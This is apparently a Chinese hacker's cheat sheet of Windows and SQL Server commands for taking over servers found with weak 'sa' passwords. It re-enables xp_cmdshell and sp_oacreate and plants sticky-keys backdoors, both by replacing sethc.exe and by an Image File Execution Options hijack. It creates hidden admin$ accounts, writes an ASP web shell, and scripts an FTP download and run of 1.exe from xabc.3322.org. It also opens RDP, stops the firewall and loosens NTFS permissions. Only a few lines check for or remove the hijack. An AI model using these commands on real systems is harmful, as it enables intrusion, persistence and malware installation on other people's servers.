query user 查看会话
logoff 踢人命令
5下shift后门
系统后门:
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
打开3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
关闭系统防火墙
net stop sharedaccess
net stop policyagent 关闭IPSC
SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'show advanced options', 0 --
第一步执行:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call
*/
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
第二步执行
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
直接加USER:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'net user 123 123 /add & net localgroup administrators 123 /add'
SQL沙盒提权
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user admin$ 199181. /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators admin$ /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup Remote Desktop Users 123 /add")');
-----------------------------SQL语句--------------------------------------
修改SA密码:
Sp_password 'OldPassword','NewPassword'
sp_password Null,'199181','sa'
《防替换SHIFT》加属性
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
attrib c:\windows\system32\sethc.exe +h +r +s
《防替换》去属性
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
shift后门:
%SystemRoot%\explorer.exe
查询分离器SHIFT:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'
WIN2000直接建立用户:
exec xp_cmdshell 'net user admin$ 199181 /add'
exec xp_cmdshell 'net localGroup Administrators admin$ /add'
起用用户:
net user admin$ /active:yes
查看3389终端:
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
269998505
查看配置
systeminfo
劫持地址查看 boot.dat
-----------------------------SQL修复-----------------------------------------------
ipconfig :查看本地ip地址
type c:\boot.ini
解决127错误
第一步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
第一
exec sp_dropextendedproc 'xp_cmdshell'
第二
dbcc addextendedproc ("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0 --
查看系统属性
EXEC xp_msver
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\10.txt', 10
exec @ret = sp_oamethod @f, 'writeline', NULL,'open xabc.3322.org'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'binary'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe c:\1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
exec @ret = sp_oamethod @f, 'writeline', NULL,'1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'exit'
普通CMD后门
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
SQL写一句话
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
映象劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql命令删除注册表粘滞键的劫持功能护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
sql写文件〈写完后直接执行c:\1.vbs完成后建立user:test pass:1234>
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\2.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
无NET提权的脚本
struser=wscript.arguments(0)
strpass=wscript.arguments(1)
set lp=createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)
For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next
Wscript.echo struser & " 用户建立失败!"
将以上保存为user.VBS文件
然后执行:cscript user.vbs 用户名 密码
1433无命令添加用户
用法很简单
扫到1433弱口令
net被禁止了的
把这个文件传到任何盘
然后输入命令"盘符+文件名+帐号+密码"
如 c:\en.exe jksing jksing"
会自动添加到administrators组
type C:\boot.ini 系统
netstat -an 是查看服务器开放的端口
Ipconfig 本机IP ipconfig/all
net user admin 1985117 /add 这个就是添加管理员的dos口令admin$是用户名后面加个$号
net localgroup administrators admin /add这是dos下提升管理的口令
net user 要删除的用户名 /del
regedit 打开注册表
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享
net use c: /del 删除映射的c盘 net use * /del /y删除全部
net start telnet 启动 Telnet 服务
net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务)
net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)!
net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)
net user 得到本地主机的用户列表
开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
更改终端端口为20008(0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.开启Win2000的终端,端口为3389(需重启)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console
9.调整NTFS分区权限
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
首先开启三个服务
1.Server
2.Computer Browser
3.Workstation